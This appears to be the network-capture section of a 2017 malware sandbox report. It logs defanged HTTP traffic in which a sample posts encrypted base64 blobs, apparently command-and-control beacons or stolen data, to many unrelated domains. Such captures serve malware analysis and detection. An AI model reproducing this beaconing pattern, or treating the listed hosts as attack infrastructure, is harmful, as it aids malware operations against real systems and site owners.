sp4gdq/n/l0yxJNAznHHMrj9IVfFzR0uU9IglOFXr6WOYszaCyGJd sJ0 6eRpGXj1sKwgbZ1Kmt3JwOcTm2PfWlO3JRmkD1cvHRAEQ2e7G98nuEXkkqze4s2acElyXyw5P0QnNNTPg/vCgFckvKoxluZNHhndgX31D/m00lCJy5l2/ 12/05tanXBEohtLHnbh 1fcXW0xKCp1Zlj3QdhWMdZVx/YKwK5EtYFp0wwEkNswFh/6yCw11Td96g wpj9SRtCdFprQF4nYe0QFKG5kMJknCcEt3ntGHeXNcNWBqQCgZ2zRfigJEPMDU8 GG6F3YtgXs7fKfB5dqM7Yb/I263JDGa3cqGCA51FlwiAFYntxpb4netcQjUAVXMe73TGEuipXvHEAlOX1Xfg6gPcsVO9dZg3WLmr9Co5YgWAGTwnFxbWhhgWQFb/2zKbvgTPdIwXavQeZPjROM4U7DndfvmxHGaZUpswVOZLgj
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Sat, 01 Jul 2017 11:16:37 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive
Location: hXXp://VVV.sztartufi.com/
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx</center>..</body>..</html>..HTTP/1.1 301
Moved Permanently..Server: nginx..Date: Sat, 01 Jul 2017 11:16:37 GMT
..Content-Type: text/html..Content-Length: 178..Connection: keep-alive
..Location: hXXp://VVV.sztartufi.com/..<html>..<head><t
itle>301 Moved Permanently</title></head>..<body bgc
olor="white">..<center><h1>301 Moved Permanently</h1
></center>..<hr><center>nginx</center>..<
;/body>..</html>....


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: naijagurus.com
Connection: Keep-Alive
Cache-Control: no-cache

V9RECgs1KW9z3/BAYga8enQj/A9RLP7Fb 9gRcvFpDY6M2qn6kCs0PBZng2Js8YjJGuWpCG1BzUR0MPcn yB3bSvLcvCgqGJk9GmtM7dELAxaSM Vfbjaev3vsuOr2waAqh2LQFkwoCmgWjsEKPUvOZxf630KTK7J9 xKi0M452PTfdTC38eHF1ksFIBnZWmcl7n6eibEyBpDIeykNlaGx39bOQgvJ7Yeaf1TD5u0YyuQHf/IhnX8n8Wysx523SZd9VgQk3E9rLIGhIqm0Dv2WnGoL3YjjTvwJ4wMUQgdXb8BM6rmhpyoSA5MYxe3v1GK NSMKTxiePKjytgs7sp2o4ZyzQ0YnKITdZ64jfMehGPOrqMWd kg0frJb9UM1ZanouxHjekGwUalarjXjSN0NueFAh4rjs2r0Ys0t60gNZnCShO/a8WIG1/ub Y RDGIvtfoA2PCxkUrQTaZjd7g6d510B2dTWgwcfQZ7W1JPMV XiCuDvJXjA=
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=da68f6544f316bb0b72405d74d8c043cf1498907818; expires=Sun, 01-Jul-18 11:16:58 GMT; path=/; domain=.naijagurus.com; HttpOnly
Location: hXXp://VVV.naijagurus.com/
Server: cloudflare-nginx
CF-RAY: 3778f4c817af8237-KBP
b2..<html>..<head><title>301 Moved Permanently</t
itle></head>..<body bgcolor="white">..<center><
;h1>301 Moved Permanently</h1></center>..<hr><
center>nginx</center>..</body>..</html>..0..HTTP/
1.1 301 Moved Permanently..Date: Sat, 01 Jul 2017 11:16:58 GMT..Conten
t-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive.
.Set-Cookie: __cfduid=da68f6544f316bb0b72405d74d8c043cf1498907818; exp
ires=Sun, 01-Jul-18 11:16:58 GMT; path=/; domain=.naijagurus.com; Http
Only..Location: hXXp://VVV.naijagurus.com/..Server: cloudflare-nginx..
CF-RAY: 3778f4c817af8237-KBP..b2..<html>..<head><title&
gt;301 Moved Permanently</title></head>..<body bgcolor=
"white">..<center><h1>301 Moved Permanently</h1>&
lt;/center>..<hr><center>nginx</center>..</bod
y>..</html>..0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 420
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: c21edu.com
Connection: Keep-Alive
Cache-Control: no-cache

aK71G1oJ411y54AGfUh6YJ2vPftKhPiFLnGLS9rJq3FhxAPMiYSZZyIaVS83te/bxRXhOH3ApNUeTBVBrtPEYgEaRLKWTUlhZpT/KADQHreWyH5PV2mhKmUi8QRPhFgBv2Bwf cOjZMt3gnicP4MLoGUcxUGpssaoRptQ5Rq5NLv05ZGj0mb125b05H23f1E29CEfXvF10KhSsmth bBZTwYftbNYWvDyeQkLL8WOcKrFrebV/pG1oiNW1PVrKqb6EmauCOXhjUeRXpi6bOzZtXxsj672M95pKo6aYxXKDK700LazfK2BTVRS5YKnWKCyRjGuOtcWEHdAN6VXC vE79NPIHBiOQ7k6miWrlGAHU2ZRJoH7IrV4MpeUZS3Vm14qsmtV/TBXkeRSRqTacVsHOUAc7K6fxp2og=
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Link: <hXXp://wp.me/P11tbD-b9>; rel=shortlink
X-ac: 3.ams _dfw
13fd..<!DOCTYPE html>.<!--[if IE 7]>    <html class="no
-js IE7 IE" lang="en"> <![endif]-->.<!--[if IE 8]> &
lt;html class="no-js IE8 IE" lang="en"> <![endif]-->.<!--[
if IE 9]> <html class="no-js IE9 IE" lang="en"> <![endi
f]-->.<!--[if gt IE 9]><!--> <html class="no-js" lan
g="en"> <!--<![endif]-->.<head>..<title>Centur
y 21 Edu Net</title>...<!-- Basic Meta Data -->..<meta
charset="UTF-8" />..<meta name="viewport" content="width=device-
width, initial-scale=1.0" />...<!-- WordPress -->..<link r
el="pingback" href="hXXp://c21edu.com/xmlrpc.php" />...<script t
ype="text/javascript">. WebFontConfig = {"google":{"families":["Ro
boto Slab:b:latin,latin-ext","Source Sans Pro:r,i,b,bi:latin,latin-ext
"]}};. (function() {. var wf = document.createElement('script');.
wf.src = 'hXXp://s1.wp.com/wp-content/plugins/custom-fonts/js/webfo
nt.js?m=1463486645h';. wf.type = 'text/javascript';. wf.async =
'true';. var s = document.getElementsByTagName('script')[0];. s.
parentNode.insertBefore(wf, s);..})();.</script><style id="je
tpack-custom-fonts-css">.wf-active .branding h1{font-family:"Roboto
Slab",serif;font-weight:700;font-style:normal}.wf-active body{font-fa
mily:"Source Sans Pro",sans-serif}.wf-active .branding h4{font-family:
"Source Sans Pro",sans-serif}@media screen and (min-width: 1042px){.wf
-active blockquote p{font-family:"Source Sans Pro",sans-serif}}@me

<<< skipped >>>

POST / HTTP/1.1

Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 448
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: c21edu.com
Connection: Keep-Alive
Cache-Control: no-cache

/uvAOuFcFH83AvOwQFBy37pXWgXfp3DfpVGp1H9uVJ3pfOwEcI2nE 7dL6UiF3ol cjyPvK8/UcumI5PuK730fsI4Q03iuoVJS8rfJD FORmNhk 94NWLxkpvOf4Rs4CzlQNK1CxUd3OfVLmxNB3qLRt/KY qB1hetRmQu17rNvkTYd1mDfHwQvQFkf40LhYsefHK9oYZSXqkC22pI3goUq2gLDvNttfFSQ/dasvw2/O/G9T2rAEWueupYNiZr9VN  ca0cF8u3mgkCvJHKWbDxXhexQ8N8lPk0TL9PR4pc1YxfZXx/YHxL1DZDIUT30QFOKuOTeyb6NkJ5JJ4V006LJDnFNQMrj4ts7qywPUlcEMHgT7z2erwBrkWUhxnRZf27rP46r53D3HMDhvvy9/51Z7Vym8QFl8W6D NOMQawTreXqrhgXKoj3dnsdMYy4
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:17:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Link: <hXXp://wp.me/P11tbD-b9>; rel=shortlink
X-ac: 3.ams _dfw
40ad..<!DOCTYPE html>.<!--[if IE 7]>    <html class="no
-js IE7 IE" lang="en"> <![endif]-->.<!--[if IE 8]> &
lt;html class="no-js IE8 IE" lang="en"> <![endif]-->.<!--[
if IE 9]> <html class="no-js IE9 IE" lang="en"> <![endi
f]-->.<!--[if gt IE 9]><!--> <html class="no-js" lan
g="en"> <!--<![endif]-->.<head>..<title>Centur
y 21 Edu Net</title>...<!-- Basic Meta Data -->..<meta
charset="UTF-8" />..<meta name="viewport" content="width=device-
width, initial-scale=1.0" />...<!-- WordPress -->..<link r
el="pingback" href="hXXp://c21edu.com/xmlrpc.php" />...<script t
ype="text/javascript">. WebFontConfig = {"google":{"families":["Ro
boto Slab:b:latin,latin-ext","Source Sans Pro:r,i,b,bi:latin,latin-ext
"]}};. (function() {. var wf = document.createElement('script');.
wf.src = 'hXXp://s1.wp.com/wp-content/plugins/custom-fonts/js/webfo
nt.js?m=1463486645h';. wf.type = 'text/javascript';. wf.async =
'true';. var s = document.getElementsByTagName('script')[0];. s.
parentNode.insertBefore(wf, s);..})();.</script><style id="je
tpack-custom-fonts-css">.wf-active .branding h1{font-family:"Roboto
Slab",serif;font-weight:700;font-style:normal}.wf-active body{font-fa
mily:"Source Sans Pro",sans-serif}.wf-active .branding h4{font-family:
"Source Sans Pro",sans-serif}@media screen and (min-width: 1042px){.wf
-active blockquote p{font-family:"Source Sans Pro",sans-serif}}@me

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 460
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: telenavis.com
Connection: Keep-Alive
Cache-Control: no-cache

3OIdh1/r315rkcuKvsHcQeisgGc1w2nYA/kXDBh34UfR72i/C6UtbBoVkVB9zXpv CFOuLJwPp/pi47IQesbCJkh1wAjUrjfNtUKCCUsSYbqZNO58JRsbc5S 9vzf5Q5AqHuzNqBn2DaAWKZvuVVF2dCIZMGc 1LI2DnizyBYvAr8quGSflOsg L8b07TXsRP y7zbs9ywIaUS1nXD2rtgv5ZBtp a9v7HajML3CxFNm7L6CqQQPrBHW4ERBV rk1zpf8YsfnF0EzBjaCJl1e0zPELgxMJTbOSm73Kiles8UBQ4gEF749JVz1YYdVgCw143NrefIlZzba1u/FHnUMIIcMRUD52lFBum67lajRlkVDs04AbM6rbCw7cWriqV6ApXYjwxxsjyMDLoRknQ1QRgnkyZVV5/axLgI5gYdZ5KrfoP5BhskimzjGoWrG xxgoyQptuRqw==
HTTP/1.1 403 Forbidden ( The server denied the specified Uniform Resource Locator (URL). Contact the server administrator. )
Date: Sat, 01 Jul 2017 11:16:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dea6d3e68a998cf8badd2c64cb0103c451498907799; expires=Sun, 01-Jul-18 11:16:39 GMT; path=/; domain=.telenavis.com; HttpOnly
Pragma: no-cache
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f450d7888261-KBP
4c4..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&
gt;..<HTML dir=ltr><HEAD><TITLE>The page cannot be d
isplayed</TITLE>..<STYLE id=L_defaultr_1>A:link {...FONT:
8pt/11pt verdana; COLOR: #ff0000..}..A:visited {...FONT: 8pt/11pt verd
ana; COLOR: #4e4e4e..}..</STYLE>..<META content=NOINDEX name=
ROBOTS>..<META http-equiv=Content-Type content="text-html; chars
et=UTF-8">..<META content="MSHTML 5.50.4522.1800" name=GENERATOR
></HEAD>..<BODY bgColor=#ffffff>..<TABLE cellSpacing
=5 cellPadding=3 width=410>.. <TBODY>.. <TR>.. <
;TD vAlign=center align=left width=360>.. <H1 id=L_defaultr
_2 style="FONT: 13pt/15pt verdana; COLOR: #000000"><ID id=L_defa
ultr_3><!--Problem-->The page cannot be displayed..</ID>
;</H1></TD></TR>.. <TR>.. <TD width=400
colSpan=2><FONT id=L_defaultr_4.. style="FONT: 8pt/11pt ve
rdana; COLOR: #000000"><ID id=L_defaultr_5><B>Explanati
on: </B>There is a problem with the page you are trying to reach
and it cannot be displayed.</ID></FONT></TD></TR
>.. <TR>.. <TD width=400 colSpan=2><FONT id=L_de
faultr_6 .. style="FONT: 8pt/11pt verdana; COLOR: #000000">..
<HR color=#c0c0c0 noShade>.. <P id=L_defaultr_7>
<B>Try the following:</B></P>.. <UL>..
..324.. <LI id=L_defaultr_8><B>Refresh page:</B

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 492
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: macgregor.co.kr
Connection: Keep-Alive
Cache-Control: no-cache

nNEFMUoQI2FX2Vf1rUPuug2AgDf6PfL0HveCoG5sgd3bdyvjyxIZVSYYvwYRZJpCrE4FcxJXsIRTTSHTdjiq0fu1eGeWVPPISHh53Dz3ILzeTFy6opK718gLzu/x4FT83NxBG3MZigf/sKRmt n7vSHBnlSszXOUMDfYHV1r1604y4HmCC469fvGiBLyDOQLtai mK/OTn3XihSq F4urXuEMrFCYqPjzfqM4kty/JO/92E6y3Q/o0//ToWkdRAunU7rT0InRwBWBE5OZ73/XBv0f3hth oFmCfmUZ6/KzlL51s4qr2RE7UaLcC414XVIPzTyXgtIYhLRhYxnR6mIrH27H6uYDex0beTJu7Z0O/CTNUqRo0F9fnTvyC7hhe1l4cpLUJlPRk/cux/3CdTunPmrknZltGR5Q8YVq55NkY7D2NRgzzP9sMyCa0NyObW3j9DfPuyPlQtdfoduOkg0BjBrIpUnX2ojqTAgSnhJLd/
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:16:50 GMT
Content-Type: text/html
Content-Length: 1579
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="ko" lang="ko"&
gt;<head><meta http-equiv="Content-Type" content="text/html;
charset=utf-8" /><style type="text/css">body { width:100%; he
ight:100%; } .wrap { position:fixed; top:50%; left:50%; margin:-185px
0 0 -315px; width:630px; height:370px; } h1 {margin: 0 0 20px; font-si
ze: 15pt;}</style></head><body><script type="text
/javascript" src="/cupid.js" ></script><script>function
toNumbers(t){var e=[];return t.replace(/(..)/g,function(t){e.push(par
seInt(t,16))}),e}function toHex(){for(var t=[],t=1==arguments.length&&
arguments[0].constructor==Array?arguments[0]:arguments,e="",o=0;o<t
.length;o )e =(16>t[o]?"0":"") t[o].toString(16);return e.toLowerC
ase()}function getUrlParams(){var t={};return window.location.search.r
eplace(/[?&] ([^=&] )=([^&]*)/gi,function(e,o,r){t[o]=r}),t}var a=toNu
mbers("6fa26a77caa0d6ba80c36948778a01ef"),b=toNumbers("0eb01eaf2b07e11
6a2a13340d0646578"),c=toNumbers("77e0b43b950dfa601e080c0c0f0417ba"),no
w=new Date,time=now.getTime();time =864e5,now.setTime(time),document.c
ookie="CUPID=" toHex(slowAES.decrypt(c,2,a,b)) "; expires=" now.toUTCS
tring() "; path=/",oParams=getUrlParams(),nCkattempt=0,oParams.ckattem
pt&&(nCkattempt=parseInt(oParams.ckattempt)),nCkattempt<3&&(locatio
n.href="hXXp://macgregor.co.kr/?ckattempt=1");</script><div c
lass="wrap"><div align="center"><h1>...................
.. ...... ............... ......... .............</h1><p&

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.acicinvestor.ca
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 01 Jul 2017 11:16:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.30
X-Pingback: hXXp://VVV.acicinvestor.ca/xmlrpc.php
Link: <hXXp://VVV.acicinvestor.ca/wp-json/>; rel="hXXps://api.w.org/", <hXXp://VVV.acicinvestor.ca/>; rel=shortlink
X-Powered-By: PleskLin
MS-Author-Via: DAV
1e8f..<!DOCTYPE html>..<!--// OPEN HTML //-->..<html la
ng="en-US">...<!--// OPEN HEAD //-->...<head>..........
<!--// SITE TITLE //-->....<title>ACIC Investor | BC Based
Real Estate Finance Company with deep understanding of real estate ma
rkets</title>............<!--// SITE META //-->....<met
a charset="UTF-8" />.....<meta name="viewport" content="width=de
vice-width, user-scalable=no, initial-scale=1, maximum-scale=1">...
.......<!--// PINGBACK & FAVICON //-->....<link rel="pingback
" href="hXXp://VVV.acicinvestor.ca/xmlrpc.php" />....<link rel="
shortcut icon" href="hXXp://acicinvestor.ca/wp-content/uploads/2016/04
/favicon.ico" />............<!--// GOOGLE FONT LOADER //-->..
..<script>.....var html = document.getElementsByTagName('html')[
0];.....html.className = ' wf-loading';.....setTimeout(function() {.
.... html.className = html.className.replace(' wf-loading', '');.....
}, 3000);..........WebFontConfig = {..... google: { families: ['Ope
n Sans', 'Open Sans', 'Open Sans', 'Vidaloka'] }.....};..........(fun
ction() {......document.getElementsByTagName("html")[0].setAttribute("
class","wf-loading")......// NEEDED to push the wf-loading class to y
our head......document.getElementsByTagName("html")[0].setAttribute("c
lassName","wf-loading")......// for IE.............var wf = document.c
reateElement('script');......wf.src = ('https:' == document.location.p
rotocol ? 'https' : 'http') ...... '://ajax.googleapis.com/ajax/l

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 448
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ziuabarbatului.ro
Connection: Keep-Alive
Cache-Control: no-cache

9GpMYN6FenZLuv9tKTOsJMFS3sAe5aV 8tMYaWdh3TvG5w9JQl3BXdMJ5CZuJNR4SDyqLgWITXIsBMDMNbd6odbX9pqrGOoflbryEWDBA7wDoyT75YN 6ZvuJva8iragOhkYVm3aKRxBqWWqwc6coUqSYMIhnrW8xatTCJIoDmVM1AMC8FjM17/ZgEWdzuS olbN gHey6Gps8HEdVSdMoNCiiTDHoruZXDtewDLE9egzOlLFNyzoGvpxGIBx seRCvZH/HjSNBp1DjNrekvqkuToM7tv doHNh0eZXQ/Bqou4tWRGMixFIr4YRwJ4isMKlJs4AM6nMwhyTrxy7T8Xq0yq VqjqCzesUHsBoSnfn1OPSTXskXlDVwezKyfuXDMR5iu ITCxIc9Jf9PG89YfmvlwrEHigM4U3niwkuE6Z5gIG VdjjYpoqrtLx81n
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:18:15 GMT
Server: Apache
Location: hXXps://VVV.bergenbier.ro/
Content-Length: 234
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>301 Moved Permanently</title>.</head
><body>.<h1>Moved Permanently</h1>.<p>The d
ocument has moved <a href="hXXps://VVV.bergenbier.ro/">here</
a>.</p>.</body></html>...


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sarahdavid.com
Connection: Keep-Alive
Cache-Control: no-cache

0XU4yKikl4VezgcPaz8lhRs WBSwNGZLXIrZ5i6xCYC4DK85HVhnV14EY10C3iaPzbXr5mREL5uy2lFE2sPwqX6qMhrmyAPtdAqXyqNNjf32b/Lsb N2VtWIkELiT0Da39piMCYMfR5OflgkqYHs DMteRy/byGSgnISPt84c8LCvDJ0C9nOVRi6dOHFJuO2ddny3dxL2s/cMoy5oH2y4qOqixjSE/lYQLYdP4NoIpAshlvFBrPvqRBwUytXbcOwoGh3XAA jJ89GIrdJVzdURzeGQIDgCWLsGcWRiP5OCgzHgYv 89D8QWBlWG66i xyBMvRLV6o5VmXitsWMtxu eqyLpK9fA9Dxe/fI7WUvlD9gU1HDotVLM8ECX3uP3qadE31eL8YLgSUHAUyt0QdQdxdqOEkrsLVlZEHLmi6pVBmk73qBxAlNXYUxqMlCwlU5Z8g7CPJ7YSQrprOeY=
HTTP/1.1 307 Temporary Redirect
Connection: close
Pragma: no-cache
cache-control: no-cache
Location: /


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 524
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: theautospas.com
Connection: Keep-Alive
Cache-Control: no-cache

KhTwZSuD5nHqsG/BAr6ZrJQ2CN7xlFnqj884sRosgl5lgFzdbgfj/pfsHMSERvBsEwYzI/lMR90Xlb3vVj/Zk6D yNHHruaCFtq4SJJ L8NOYpoRLc4S7WkH0EV1vlCQ 3b/1d46tfk9/ARagNm 0QfqM5z2mCsyKqxbcQRWfsbYHYclmjIKkft6K4d2TWahhYpPmkpu 7NBLsfTl3D C6WAEW1vV7iHttPYiZe1APQLnlWLY9zu2CPhPDs  QtYEtIQniLg55XTNj/IhCr1G ZlTnEnyn9pFDdi2zqUsCozNQPb0ZjVmIB3EjkjMyCozkcId7CEaRMtKNrqiPLtyCmzztEweBTAvCbQJBRwmhM0/wFZAHs/viDhmm3hJLoXg2 1XG1VBfJkQalfZkX1QGqTzoDhbzri0D4ae2Ehs00ItyBDHBA4ZLODwgNcp//GvULMQNP695PnNjOyQiWtYuT55TEBQuUc7jhVhjNTtsYlP573m05 FhZPiidR76Eks/i/Nbb77A==
HTTP/1.1 403 Forbidden
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d135bd48f16330a6e34180f14a25346d81498907821; expires=Sun, 01-Jul-18 11:17:01 GMT; path=/; domain=.theautospas.com; HttpOnly
X-Powered-By: PleskLin
Server: cloudflare-nginx
CF-RAY: 3778f4dc361d843c-KBP
1319..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "hXXp://www
.w3.org/TR/xhtml11/DTD/xhtml11.dtd">.<head>.<title>Apac
he HTTP Server Test Page powered by CentOS</title>.<meta http
-equiv="Content-Type" content="text/html; charset=UTF-8"/>.<styl
e type="text/css">body{background-color:#fff;color:#000;font-size:0
.9em;font-family:sans-serif,helvetica;margin:0;padding:0;}:link{color:
#0000FF;}:visited{color:#0000FF;}a:hover{color:#3399FF;}h1{text-align:
center;margin:0;padding:0.6em 2em 0.4em;background-color:#3399FF;color
:#ffffff;font-weight:normal;font-size:1.75em;border-bottom:2px solid #
000;}h1 strong{font-weight:bold;}h2{font-size:1.1em;font-weight:bold;}
.content{padding:1em 5em;}.content-columns{position:relative;padding-t
op:1em;}.content-column-left{width:47%;padding-right:3%;float:left;pad
ding-bottom:2em;}.content-column-right{width:47%;padding-left:3%;float
:left;padding-bottom:2em;}.content-columns>.content-column-left,.co
ntent-columns>.content-column-right{}img{border:2px solid #fff;padd
ing:2px;margin:2px;}a:hover img{border:2px solid #3399FF;}</style&g
t;.</head>.<body>.<h1>Apache 2 Test Page<br>&l
t;font size="-1"><strong>powered by</font> CentOS</s
trong></h1>.<div class="content">.<div class="conten
t-middle">.<p>This page is used to test the proper operation
of the Apache HTTP server after it has been installed. If you can read
this page it means that the Apache HTTP server installed at this

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: rd=R3047009581
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.doctsf.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:16:41 GMT
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: mediaplanBAK=R129289740; path=/; expires=Sat, 01-Jul-2017 12:29:33 GMT
Set-Cookie: mediaplanD=R904194738; path=/; max-age=900
Location: hXXps://VVV.doctsf.com/
Vary: Accept-Encoding
X-CDN-Pop: sbg
X-CDN-Pop-IP: 137.74.120.32/27
X-Cacheable: Cacheable
Transfer-Encoding: chunked
X-IPLB-Instance: 4865
00e7..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<htm
l><head>.<title>301 Moved Permanently</title>.<
;/head><body>.<h1>Moved Permanently</h1>.<p>
;The document has moved <a href="hXXps://VVV.doctsf.com/">here&l
t;/a>.</p>.</body></html>...0..HTTP/1.1 301 Moved
Permanently..Date: Sat, 01 Jul 2017 11:16:41 GMT..Content-Type: text/
html; charset=iso-8859-1..Set-Cookie: mediaplanBAK=R129289740; path=/;
expires=Sat, 01-Jul-2017 12:29:33 GMT..Set-Cookie: mediaplanD=R904194
738; path=/; max-age=900..Location: hXXps://VVV.doctsf.com/..Vary: Acc
ept-Encoding..X-CDN-Pop: sbg..X-CDN-Pop-IP: 137.74.120.32/27..X-Cachea
ble: Cacheable..Transfer-Encoding: chunked..X-IPLB-Instance: 4865..00e
7..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html&g
t;<head>.<title>301 Moved Permanently</title>.</h
ead><body>.<h1>Moved Permanently</h1>.<p>Th
e document has moved <a href="hXXps://VVV.doctsf.com/">here</
a>.</p>.</body></html>...0..

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.combine.or.id
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 10:55:24 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_python/3.5.0- Python/2.7.5
X-Powered-By: PHP/5.4.16
X-Pingback: hXXp://VVV.combine.or.id/xmlrpc.php
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
1f83..<!DOCTYPE html> .<html class="no-js" lang="en-US">..
<head>..<meta charset="UTF-8">..<meta name="viewport" c
ontent="width=device-width, initial-scale=1.0">...<title>Comb
ine Resource Institution - Community Based Information Network</tit
le>...<link rel="pingback" href="hXXp://VVV.combine.or.id/xmlrpc
.php">....<script>document.documentElement.className = docume
nt.documentElement.className.replace("no-js","js");</script>.<
;link rel="alternate" type="application/rss xml" title="Combine Resour
ce Institution » Feed" href="hXXp://VVV.combine.or.id/feed/" /&g
t;.<link rel="alternate" type="application/rss xml" title="Combine
Resource Institution » Comments Feed" href="hXXp://VVV.combine.o
r.id/comments/feed/" />.<link rel='stylesheet' id='style-css' h
ref='hXXp://VVV.combine.or.id/wp-content/themes/hueman-cri/style.css?v
er=3.9.19' type='text/css' media='all' />.<link rel='stylesheet'
id='responsive-css' href='hXXp://VVV.combine.or.id/wp-content/themes
/hueman/responsive.css?ver=3.9.19' type='text/css' media='all' />.&
lt;link rel='stylesheet' id='font-awesome-css' href='hXXp://VVV.combi
ne.or.id/wp-content/themes/hueman/fonts/font-awesome.min.css?ver=3.9.1
9' type='text/css' media='all' />.<script type='text/javascript'
src='hXXp://VVV.combine.or.id/wp-includes/js/jquery/jquery.js?ver=1.1
1.0'></script>.<script type='text/javascript' src='hXXp://
VVV.combine.or.id/wp-includes/js/jquery/jquery-migrate.min.js?ver=

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 516
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: chscreative.com
Connection: Keep-Alive
Cache-Control: no-cache

  hCNYqpH3yaYxiD7YsRtk2vVBU6YDT7XkQdhz2BBQ yEvJ86WnZHGLU5yo5GhUOiGuRayp5yVK/gdZ57sTAQQoAoWYiTHDHbhbZca77d8u/TUbxXaFnJBR/k5wv5rGi6CuP4SZs7jbWkdTsmaJWMjygJKuHcoAXm/Gfb7qz2wG9eEW1Z9jReDGP2u T63VQJLKGhrihoy6oiMYmp8d18TXLA7CXrvSEIAaCd3pbjz6JIhO0kreYh48Jvl1gDUVUFHLQFCkqpWkpyt2QApVbi/rWmI4GPfW1d0zHYrVv M4FEzQTUqVC9Qdh1XzN/MUjYxZV7OIQCjzKLS72zVKudJ5i6ZJ8MRmNYNXANg/VbUpgUzPGJZbIz5ZCVUk8bkqYakGtu0AooSsFignIcCjT2yks8joTM bDCGlPFgyyKcogfj57X7pg8m5xEDblHFE1DW/QhltrCrgdneUNsAoxGBa2ObSLeaGtyRvaAn5bkLdqtt8XWM4tpkAa3m cwyY64hWu
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __cfduid=d562bfb74f933b3657fb45d07bda4d9571498907833; expires=Sun, 01-Jul-18 11:17:13 GMT; path=/; domain=.chscreative.com; HttpOnly
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f52701e18225-KBP
